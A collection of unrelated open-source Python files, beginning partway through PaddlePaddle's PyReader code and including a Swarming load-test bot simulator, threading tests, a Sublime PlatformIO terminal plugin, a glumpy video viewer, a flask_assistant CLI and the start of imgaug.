fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
swarming_load_test_bot.py
|
#!/usr/bin/env python
# Copyright 2013 The Swarming Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0 that
# can be found in the LICENSE file.
"""Triggers a ton of fake jobs to test its handling under high load.
Generates an histogram with the latencies to process the tasks and number of
retries.
"""
import hashlib
import json
import logging
import optparse
import os
import Queue
import socket
import StringIO
import sys
import threading
import time
import zipfile
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
from third_party import colorama
import swarming
from utils import graph
from utils import net
from utils import threading_utils
# Line too long (NN/80)
# pylint: disable=C0301
OS_NAME = 'Comodore64'
TASK_OUTPUT = 'This task ran with great success'
def print_results(results, columns, buckets):
delays = [i for i in results if isinstance(i, float)]
failures = [i for i in results if not isinstance(i, float)]
print('%sDELAYS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
graph.print_histogram(
graph.generate_histogram(delays, buckets), columns, ' %.3f')
print('')
print('Total items : %d' % len(results))
average = 0
if delays:
average = sum(delays)/ len(delays)
print('Average delay: %s' % graph.to_units(average))
print('')
if failures:
print('%sEVENTS%s:' % (colorama.Fore.RED, colorama.Fore.RESET))
values = {}
for f in failures:
values.setdefault(f, 0)
values[f] += 1
graph.print_histogram(values, columns, ' %s')
print('')
def generate_version(source):
"""Generates the sha-1 based on the content of this zip.
Copied from:
https://code.google.com/p/swarming/source/browse/services/swarming/swarm_bot/zipped_archive.py
"""
result = hashlib.sha1()
with zipfile.ZipFile(source, 'r') as z:
for item in sorted(z.namelist()):
with z.open(item) as f:
result.update(item)
result.update('\x00')
result.update(f.read())
result.update('\x00')
return result.hexdigest()
def calculate_version(url):
"""Retrieves the swarm_bot code and returns the SHA-1 for it."""
# Cannot use url_open() since zipfile requires .seek().
return generate_version(StringIO.StringIO(net.url_read(url)))
def get_hostname():
return socket.getfqdn().lower().split('.', 1)[0]
class FakeSwarmBot(object):
"""This is a Fake swarm_bot implementation simulating it is running
Comodore64.
It polls for job, acts as if it was processing them and return the fake
result.
"""
def __init__(
self, swarming_url, dimensions, swarm_bot_version_hash, hostname, index,
progress, duration, events, kill_event):
self._lock = threading.Lock()
self._swarming = swarming_url
self._index = index
self._progress = progress
self._duration = duration
self._events = events
self._kill_event = kill_event
self._bot_id = '%s-%d' % (hostname, index)
self._attributes = {
'dimensions': dimensions,
'id': self._bot_id,
# TODO(maruel): Use os_utilities.py.
'ip': '127.0.0.1',
'try_count': 0,
'version': swarm_bot_version_hash,
}
self._thread = threading.Thread(target=self._run, name='bot%d' % index)
self._thread.daemon = True
self._thread.start()
def join(self):
self._thread.join()
def is_alive(self):
return self._thread.is_alive()
def _run(self):
"""Polls the server and fake execution."""
try:
self._progress.update_item('%d alive' % self._index, bots=1)
while True:
if self._kill_event.is_set():
return
data = {'attributes': json.dumps(self._attributes)}
request = net.url_open(self._swarming + '/poll_for_test', data=data)
if request is None:
self._events.put('poll_for_test_empty')
continue
start = time.time()
try:
manifest = json.load(request)
except ValueError:
self._progress.update_item('Failed to poll')
self._events.put('poll_for_test_invalid')
continue
commands = [c['function'] for c in manifest.get('commands', [])]
if not commands:
# Nothing to run.
self._events.put('sleep')
time.sleep(manifest['come_back'])
continue
if commands == ['UpdateSlave']:
# Calculate the proper SHA-1 and loop again.
# This could happen if the Swarming server is upgraded while this
# script runs.
self._attributes['version'] = calculate_version(
manifest['commands'][0]['args'])
self._events.put('update_slave')
continue
if commands != ['RunManifest']:
self._progress.update_item(
'Unexpected RPC call %s\n%s' % (commands, manifest))
self._events.put('unknown_rpc')
break
store_cmd = manifest['commands'][0]
if not isinstance(store_cmd['args'], unicode):
self._progress.update_item('Unexpected RPC manifest\n%s' % manifest)
self._events.put('unknown_args')
break
result_url = manifest['result_url']
test_run = json.loads(store_cmd['args'])
if result_url != test_run['result_url']:
self._progress.update_item(
'Unexpected result url: %s != %s' %
(result_url, test_run['result_url']))
self._events.put('invalid_result_url')
break
ping_url = test_run['ping_url']
ping_delay = test_run['ping_delay']
self._progress.update_item('%d processing' % self._index, processing=1)
# Fake activity and send pings as requested.
while True:
remaining = max(0, (start + self._duration) - time.time())
if remaining > ping_delay:
# Include empty data to ensure the request is a POST request.
result = net.url_read(ping_url, data={})
assert result == 'Success.', result
remaining = max(0, (start + self._duration) - time.time())
if not remaining:
break
time.sleep(remaining)
# In the old API, r=<task_id>&id=<bot_id> is passed as the url.
data = {
'o': TASK_OUTPUT,
'x': '0',
}
result = net.url_read(manifest['result_url'], data=data)
self._progress.update_item(
'%d processed' % self._index, processing=-1, processed=1)
if not result:
self._events.put('result_url_fail')
else:
assert result == 'Successfully update the runner results.', result
self._events.put(time.time() - start)
finally:
try:
# Unregister itself. Otherwise the server will have tons of fake slaves
# that the admin will have to remove manually.
response = net.url_open(
self._swarming + '/delete_machine_stats',
data=[('r', self._bot_id)])
if not response:
self._events.put('failed_unregister')
else:
response.read()
finally:
self._progress.update_item('%d quit' % self._index, bots=-1)
def main():
colorama.init()
parser = optparse.OptionParser(description=sys.modules[__name__].__doc__)
parser.add_option(
'-S', '--swarming',
metavar='URL', default='',
help='Swarming server to use')
parser.add_option(
'--suffix', metavar='NAME', default='', help='Bot suffix name to use')
swarming.add_filter_options(parser)
# Use improbable values to reduce the chance of interferring with real slaves.
parser.set_defaults(
dimensions=[
('cpu', ['arm36']),
('hostname', socket.getfqdn()),
('os', OS_NAME),
])
group = optparse.OptionGroup(parser, 'Load generated')
group.add_option(
'--slaves', type='int', default=300, metavar='N',
help='Number of swarm bot slaves, default: %default')
group.add_option(
'-c', '--consume', type='float', default=60., metavar='N',
help='Duration (s) for consuming a request, default: %default')
parser.add_option_group(group)
group = optparse.OptionGroup(parser, 'Display options')
group.add_option(
'--columns', type='int', default=graph.get_console_width(), metavar='N',
help='For histogram display, default:%default')
group.add_option(
'--buckets', type='int', default=20, metavar='N',
help='Number of buckets for histogram display, default:%default')
parser.add_option_group(group)
parser.add_option(
'--dump', metavar='FOO.JSON', help='Dumps to json file')
parser.add_option(
'-v', '--verbose', action='store_true', help='Enables logging')
options, args = parser.parse_args()
logging.basicConfig(level=logging.INFO if options.verbose else logging.FATAL)
if args:
parser.error('Unsupported args: %s' % args)
options.swarming = options.swarming.rstrip('/')
if not options.swarming:
parser.error('--swarming is required.')
if options.consume <= 0:
parser.error('Needs --consume > 0. 0.01 is a valid value.')
swarming.process_filter_options(parser, options)
print(
'Running %d slaves, each task lasting %.1fs' % (
options.slaves, options.consume))
print('Ctrl-C to exit.')
print('[processing/processed/bots]')
columns = [('processing', 0), ('processed', 0), ('bots', 0)]
progress = threading_utils.Progress(columns)
events = Queue.Queue()
start = time.time()
kill_event = threading.Event()
swarm_bot_version_hash = calculate_version(options.swarming + '/bot_code')
hostname = get_hostname()
if options.suffix:
hostname += '-' + options.suffix
slaves = [
FakeSwarmBot(
options.swarming, options.dimensions, swarm_bot_version_hash, hostname, i,
progress, options.consume, events, kill_event)
for i in range(options.slaves)
]
try:
# Wait for all the slaves to come alive.
while not all(s.is_alive() for s in slaves):
time.sleep(0.01)
progress.update_item('Ready to run')
while slaves:
progress.print_update()
time.sleep(0.01)
# The slaves could be told to die.
slaves = [s for s in slaves if s.is_alive()]
except KeyboardInterrupt:
kill_event.set()
progress.update_item('Waiting for slaves to quit.', raw=True)
progress.update_item('')
while slaves:
progress.print_update()
slaves = [s for s in slaves if s.is_alive()]
# At this point, progress is not used anymore.
print('')
print('Ran for %.1fs.' % (time.time() - start))
print('')
results = list(events.queue)
print_results(results, options.columns, options.buckets)
if options.dump:
with open(options.dump, 'w') as f:
json.dump(results, f, separators=(',',':'))
return 0
if __name__ == '__main__':
sys.exit(main())
|
test_threading.py
|
from threading import Thread
from loguru import logger
import time
def test_safe(capsys):
first_thread_initialized = False
second_thread_initialized = False
entered = False
output = ""
def non_safe_sink(msg):
nonlocal entered
nonlocal output
assert not entered
entered = True
time.sleep(1)
entered = False
output += msg
def first_thread():
nonlocal first_thread_initialized
first_thread_initialized = True
time.sleep(1)
assert second_thread_initialized
logger.debug("message 1")
def second_thread():
nonlocal second_thread_initialized
second_thread_initialized = True
time.sleep(1)
assert first_thread_initialized
time.sleep(0.5)
logger.debug("message 2")
logger.start(non_safe_sink, format="{message}", catch=False)
threads = [Thread(target=first_thread), Thread(target=second_thread)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
out, err = capsys.readouterr()
assert out == err == ""
assert output == "message 1\nmessage 2\n"
|
timeitTest.py
|
# timeitTest.py
import threading
import random
import time
def myWorker():
for i in range(5):
print("Starting wait time")
time.sleep(random.randint(1,5))
print("Completed Wait")
thread1 = threading.Thread(target=myWorker)
thread2 = threading.Thread(target=myWorker)
thread3 = threading.Thread(target=myWorker)
thread1.start()
thread2.start()
thread3.start()
thread1.join()
thread2.join()
thread3.join()
|
pio_terminal.py
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sublime
import sublime_plugin
from threading import Thread
from time import sleep
from ..libraries import tools
from ..libraries.messages import Messages
from ..platformio.command import Command
from ..libraries.thread_progress import ThreadProgress
from ..libraries.I18n import I18n
class PioTerminal(Command):
def __init__(self):
super(PioTerminal, self).__init__()
name = 'PlatformIO Terminal'
self.translate = I18n().translate
self.window, self.view = tools.findInOpendView(name)
header = self.check_header()
direction = tools.get_setting('terminal_direction', 'right')
self.messages = Messages()
self.messages.initial_text(header)
self.messages.panel_name(name)
self.messages.create_panel(direction=direction, in_file=True)
self.dprint = self.messages.print
def check_header(self):
"""Terminal eader
When the console is empty, it adds a string at the beginning
Returns:
str -- header string
"""
header = None
if(self.view is None or self.view.size() == 0):
header = "pio_terminal"
return header
def close_terminal(self):
"""Close Terminal
Close the PlatformIO console including the bottom panel
"""
if self.view is not None:
self.window.focus_view(self.view)
self.window.run_command("close")
self.window.run_command('destroy_pane', {'direction': 'self'})
def print_screen(self, text):
"""Print on screen
Print all the user interaction in the console (panel)
Arguments:
text {str} -- texto to append in the console
"""
self.dprint(text)
def show_input(self):
"""Show input
Shows an input to run the commands
"""
self.window.focus_view(self.view)
cap = ' $ '
self.window.show_input_panel(cap, '', self.nonblock_cmd, None, self.cancel_input)
def nonblock_cmd(self, cmd):
"""New thread command
Runs the 'send_cmd' method in a new thread to avoid crashes
and performance problems
Arguments:
cmd {str} -- command to run
"""
thread = Thread(target=self.send_cmd, args=(cmd,))
thread.start()
ThreadProgress(thread, self.translate('processing'), '')
def cancel_input(self):
"""Cancel queue
Cancel the message queue when the input panel is cancel (esc key)
"""
def send_cmd(self, cmd):
"""Process command
Process the differents commands sended by the user. It first check if the command
is a deviot command (remove, create folder, list directory etc). If the command start
with 'pio' or 'platformio' executes the command otherwise display a "not found command"
Arguments:
cmd {str} -- command to execute
"""
if(not cmd):
return
self.dprint("\n$ {0} \n".format(cmd))
sleep(0.03)
if(self.deviot_commands(cmd)):
self.show_input()
return
cmd = cmd.replace('pio ', '').replace('platformio ', '')
cmd = cmd.split(" ")
self.cwd = os.getcwd()
self.init(extra_name="Pio Terminal 2.0", messages=self.messages)
self.run_command(cmd, in_file=True)
self.show_input()
def deviot_commands(self, cmd):
"""Custom commands
Custom commands to interact for the system, it includes
create and remove a folder, list directories, clear console
view, and other. Use the command help to see the complete list
Arguments:
cmd {str} -- command string
Returns:
bool -- True if was executed, false if the command wasn't recognised
"""
cmd_return = True
if(len(cmd.split(" ")) > 1):
cmd = cmd.split(" ")
args = " ".join(cmd[1:])
if('help' == cmd):
self.help_cmd()
elif('clear' in cmd):
self.clear_cmd()
elif('cwd' in cmd):
self.show_cwd()
elif('cd' in cmd):
self.set_cwd(cmd[1])
elif('ls' in cmd):
self.list_cwd()
elif('mk' in cmd):
self.mk_cwd(cmd[1])
elif('rm' in cmd):
self.rm_cwd(cmd[1])
elif('pio' in cmd or 'platformio' in cmd):
cmd_return = False
else:
self.dprint("invalid_command")
self.show_input()
return cmd_return
def help_cmd(self):
"""List of cmomands
Shows a list of all commands availables and the description of each one
"""
from ..libraries.I18n import I18n
width = 15
cmd_string = ["cwd", "cd", "ls", "mk", "rm", "clear", "pio --help"]
cmd_descript = ["cmd_cwd", "cmd_cd", "cmd_ls", "cmd_mk", "cmd_rm", "cmd_clear", "cmd_pio_help"]
for cmd, description in zip(cmd_string, cmd_descript):
description = I18n().translate(description)
self.dprint("{}: {}".format(cmd.ljust(width), str(description).ljust(width)))
def clear_cmd(self):
"""Clean view
Cleans the console view
"""
self.window.focus_view(self.view)
self.view.set_read_only(False)
self.window.run_command("deviot_clean_view")
self.view.set_read_only(True)
header = self.check_header()
self.dprint(header)
def show_cwd(self):
"""Currente directory
Prints the current working directory
"""
cwd = os.getcwd()
self.dprint(cwd + '\n')
def set_cwd(self, path):
"""Set directory
Sets the current working directory.
Arguments:
path {str} -- folder name (not full path)
"""
cwd = os.getcwd()
cwd = os.path.join(cwd, path)
if(not os.path.isdir(cwd)):
self.dprint('invalid_path')
return
os.chdir(path)
cwd = os.getcwd()
self.dprint(cwd + '\n')
def list_cwd(self):
"""List of files and directories
Shows the list of files and directories in the current working path
"""
from glob import glob
cwd = os.getcwd()
cwd = os.path.join(cwd, '*')
for current in glob(cwd):
self.dprint(current + '\n')
def mk_cwd(self, path):
"""Make folder
Creates a new folder in the current working path
Arguments:
path {str} -- name of the folder to create (not full path)
"""
cwd = os.getcwd()
cwd = os.path.join(cwd, path)
try:
os.makedirs(path)
self.dprint("created{0}", path)
except:
self.dprint("error_making_folder")
def rm_cwd(self, path):
"""Remove folder
Removes the folder in the current working path
Arguments:
path {str} -- folder name to remove (not full path)
"""
from shutil import rmtree
cwd = os.getcwd()
cwd = os.path.join(cwd, path)
try:
rmtree(cwd)
self.dprint("removed{0}", path)
except:
self.dprint("wrong_folder_name")
|
video.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2014, Ryan Volz
# All rights reserved.
#
# Distributed under the terms of the BSD 3-Clause ("BSD New") license.
#
# The full license is in the LICENSE file, distributed with this software.
#-----------------------------------------------------------------------------
import numpy as np
import glumpy
import threading
import time
__all__ = ['Video']
class Video(object):
def __init__(self, gen, npulses=1000, vmin=0, vmax=30, winsize=(1450, 800)):
self.gen = gen
self.npulses = npulses
self.figure = glumpy.Figure(winsize)
self.figure.event('on_mouse_motion')(self.on_mouse_motion)
self.figure.event('on_mouse_scroll')(self.on_mouse_scroll)
self.figure.event('on_key_press')(self.on_key_press)
self.figure.timer(30.0)(self.draw) # 30 works, more seems to result in skips
self.pause = [False, False]
self.stop = False
self.loc_scale = [0, 0, 1]
# initialize image
dat = self.gen.next()
self.Z = np.zeros((len(dat), npulses), dtype=np.float32)
self.Z[:, 0] = dat
self.I = glumpy.Image(self.Z, interpolation='nearest',
colormap=glumpy.colormap.IceAndFire, origin='lower',
vmin=vmin, vmax=vmax)
def on_mouse_motion(self, x, y, dx, dy):
zoom = self.loc_scale[2]
x = x/float(self.figure.width)
y = y/float(self.figure.height)
x = min(max(x,0),1)
y = min(max(y,0),1)
self.loc_scale[0] = x*self.figure.width*(1-zoom)
self.loc_scale[1] = y*self.figure.height*(1-zoom)
self.figure.redraw()
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
zoom = self.loc_scale[2]
if scroll_y > 0:
zoom *= 1.25
elif scroll_y < 0:
zoom /= 1.25
self.loc_scale[2] = min(max(zoom, 1), 20)
self.on_mouse_motion(x, y, 0, 0)
def draw(self, dt):
self.figure.clear()
self.I.update()
x,y,s = self.loc_scale
self.I.draw(x, y, 0, s*self.figure.width, s*self.figure.height)
self.figure.redraw()
def on_key_press(self, key, modifiers):
if key == glumpy.window.key.P or key == glumpy.window.key.SPACE:
self.pause[0] = not self.pause[0]
self.pause[1] = False
return True
if key == glumpy.window.key.Q or key == glumpy.window.key.ESCAPE:
self.stop = True
def _plottingthread(self):
time.sleep(1)
block_size = self.npulses
w = self.Z.shape[1]
for pulse_num, dat in enumerate(self.gen):
bn = (pulse_num + 1) % w # offset by 1 because we already read first pulse in __init__
self.Z[:, bn] = np.flipud(dat)
while self.pause[0]:
if not self.pause[1]:
print pulse_num + 1 # offset by 1 because we already read first pulse in __init__
self.pause[1] = True
time.sleep(1)
if self.stop:
break
def play(self):
t = threading.Thread(target=self._plottingthread)
t.start()
self.figure.show()
t.join()
|
cli.py
|
from __future__ import absolute_import
import sys
import logging
from flask_assistant.utils import get_assistant
from .schema_handlers import IntentGenerator, EntityGenerator, TemplateCreator
from .api import ApiAi
from . import logger
from multiprocessing import Process
logger.setLevel(logging.INFO)
api = ApiAi()
raise DeprecationWarning(
"Schema generation and management is not yet available for Dialogflow V2, please define intents and entities in the Dialogflow console"
)
def file_from_args():
try:
return sys.argv[1]
except IndexError:
raise IndexError("Please provide the file containing the Assistant object")
def gen_templates():
filename = file_from_args()
assist = get_assistant(filename)
templates = TemplateCreator(assist)
templates.generate()
def intents():
logger.info("Getting Registered Intents...")
filename = file_from_args()
assist = get_assistant(filename)
intents = assist.api.agent_intents
for i in intents:
logger.info(i.name)
return intents
def entities():
logger.info("Getting Registered Entities...")
filename = file_from_args()
assist = get_assistant(filename)
ents = assist.api.agent_entities
for i in ents:
logger.info(i.name)
return ents
def schema():
filename = file_from_args()
assist = get_assistant(filename)
intents = IntentGenerator(assist)
entities = EntityGenerator(assist)
templates = TemplateCreator(assist)
templates.generate()
intents.generate()
entities.generate()
def check():
filename = file_from_args()
assist = get_assistant(filename)
# reg_total = len(assist.api.agent_intents)
# map_total = len(assist._intent_action_funcs)
reg_names = [i.name for i in assist.api.agent_intents]
map_names = [i for i in assist._intent_action_funcs.keys()]
extra_reg = set(reg_names) - set(map_names)
extra_map = set(map_names) - set(reg_names)
if extra_reg != set():
print(
"\nThe following Intents are registered but not mapped to an action function:"
)
print(extra_reg)
print()
else:
print("\n All registered intents are mapped\n")
if extra_map != set():
print(
"\nThe Following Intents are mapped to an action fucntion, but not registered: "
)
print(extra_map)
print()
else:
print("\n All mapped intents are regitsered\n")
print("Registered Entities:")
print([i.name for i in assist.api.agent_entities])
def query():
filename = file_from_args()
assist = get_assistant(filename)
p = Process(target=assist.app.run)
p.start()
while True:
q = input("Enter query...\n")
resp = assist.api.post_query(q).json()
try:
print("Matched: {}".format(resp["result"]["metadata"]["intentName"]))
print("Params: {}".format(resp["result"]["parameters"]))
print(resp["result"]["fulfillment"]["speech"])
except KeyError:
logger.error("Error:")
logger.error(resp["status"])
|
imgaug.py
|
from __future__ import print_function, division, absolute_import
import random
import numpy as np
import copy
import numbers
import cv2
import math
from scipy import misc, ndimage
import multiprocessing
import threading
import traceback
import sys
import six
import six.moves as sm
import os
import skimage.draw
import skimage.measure
import collections
import time
if sys.version_info[0] == 2:
import cPickle as pickle
from Queue import Empty as QueueEmpty, Full as QueueFull
elif sys.version_info[0] == 3:
import pickle
from queue import Empty as QueueEmpty, Full as QueueFull
xrange = range
ALL = "ALL"
# filepath to the quokka image
QUOKKA_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"quokka.jpg"
)
DEFAULT_FONT_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"DejaVuSans.ttf"
)
# We instantiate a current/global random state here once.
# One can also call np.random, but that is (in contrast to np.random.RandomState)
# a module and hence cannot be copied via deepcopy. That's why we use RandomState
# here (and in all augmenters) instead of np.random.
CURRENT_RANDOM_STATE = np.random.RandomState(42)
def is_np_array(val):
"""
Checks whether a variable is a numpy array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy array. Otherwise False.
"""
# using np.generic here seems to also fire for scalar numpy values even
# though those are not arrays
#return isinstance(val, (np.ndarray, np.generic))
return isinstance(val, np.ndarray)
def is_single_integer(val):
"""
Checks whether a variable is an integer.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an integer. Otherwise False.
"""
return isinstance(val, numbers.Integral) and not isinstance(val, bool)
def is_single_float(val):
"""
Checks whether a variable is a float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a float. Otherwise False.
"""
return isinstance(val, numbers.Real) and not is_single_integer(val) and not isinstance(val, bool)
def is_single_number(val):
"""
Checks whether a variable is a number, i.e. an integer or float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a number. Otherwise False.
"""
return is_single_integer(val) or is_single_float(val)
def is_iterable(val):
"""
Checks whether a variable is iterable.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an iterable. Otherwise False.
"""
return isinstance(val, collections.Iterable)
# TODO convert to is_single_string() or rename is_single_integer/float/number()
def is_string(val):
"""
Checks whether a variable is a string.
Parameters
----------
val : anything
The variable to
check.
